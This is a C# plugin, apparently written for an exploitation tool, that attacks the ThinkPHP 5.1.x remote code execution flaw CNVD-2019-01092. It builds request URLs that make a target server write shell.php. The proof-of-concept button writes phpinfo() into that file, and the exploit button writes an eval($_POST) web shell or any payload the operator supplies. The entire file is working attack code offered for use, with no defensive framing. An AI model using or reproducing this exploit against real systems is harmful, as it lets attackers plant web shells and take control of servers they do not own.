```
using System.Collections.Generic;
namespace ThinkPhp5._1._29
{
public class CNVD_2019_01092
{
//POC按钮-------------------------------------------------------------------------
public Dictionary<string, string> Poc_GetUrl(Dictionary<string, Dictionary<string, string>> data)
{
//设置URL
Dictionary<string, string> numberOfTime = new Dictionary<string, string>();
Dictionary<string, string> url = new Dictionary<string, string>();
url = data["url"];
if (data["others"]["otherPayload"] != null && data["others"]["otherPayload"] != "其他载荷")
{
url["url"] = url["url"] + "/index.php?s=index/\\think\\template\\driver\\file/write&cacheFile=shell.php&content=" + data["others"]["otherPayload"];
}
else
{
url["url"] = url["url"] + @"/index.php?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?>";
}
return url;
}
public Dictionary<string, string> Poc_GetBody(Dictionary<string, Dictionary<string, string>> data)
{
//设置Body
Dictionary<string, string> body = new Dictionary<string, string>();
return body;
}
public Dictionary<string, string> Poc_GetHeaders(Dictionary<string, Dictionary<string, string>> data)
{
//设置header
Dictionary<string, string> headers = new Dictionary<string, string>();
Dictionary<string, string> numberOfTime = new Dictionary<string, string>();
Dictionary<string, string> url = new Dictionary<string, string>();
headers["UserAgent"] = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) QQBrowser/6.9.11079.201";
return headers;
}
public Dictionary<string, string> Poc_GetOther(Dictionary<string, Dictionary<string, string>> data)
{
//设置其他选项
Dictionary<string, string> other = new Dictionary<string, string>();
other = data["others"];
if (other["numberOfTime"] == "0")
{//初始标识0
other["numberOfTime"] = "1";
}
else
{//结束标志0
other["numberOfTime"] = "0";
}
return other;
}
//EXP按钮-------------------------------------------------------------------------
public Dictionary<string, string> Exp_GetUrl(Dictionary<string, Dictionary<string, string>> data)
{
//设置URL
Dictionary<string, string> numberOfTime = new Dictionary<string, string>();
Dictionary<string, string> url = new Dictionary<string, string>();
url = data["url"];
if (data["others"]["otherPayload"] != null && data["others"]["otherPayload"] != "其他载荷")
{
url["url"] = url["url"] + "/index.php?s=index/\\think\\template\\driver\\file/write&cacheFile=shell.php&content=" + data["others"]["otherPayload"];
}
else
{
url["url"] = url["url"] + "/index.php?s=index/\\think\\template\\driver\\file/write&cacheFile=shell.php&content=<?php eval($_POST[\"limanman\"]);?>";
}
return url;
}
public Dictionary<string, string> Exp_GetHeaders(Dictionary<string, Dictionary<string, string>> data)
{
//设置header
Dictionary<string, string> headers = new Dictionary<string, string>();
Dictionary<string, string> numberOfTime = new Dictionary<string, string>();
Dictionary<string, string> url = new Dictionary<string, string>();
headers["UserAgent"] = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) QQBrowser/6.9.11079.201";
return headers;
}
public Dictionary<string, string> Exp_GetBody(Dictionary<string, Dictionary<string, string>> data)
{
//设置body
Dictionary<string, string> body = new Dictionary<string, string>();
return body;
}
public Dictionary<string, string> Exp_GetOther(Dictionary<string, Dictionary<string, string>> data)
{
//设置其他
Dictionary<string, string> other = new Dictionary<string, string>();
other = data["others"];
if (other["numberOfTime"] == "0")
{
other["numberOfTime"] = "1";
}
else
{
other["numberOfTime"] = "0";
}
return other;
}
public string Info()
{
return @"thinkphp远程代码执行
thinkphp版本5.1.x<=29";
}
}
}
```
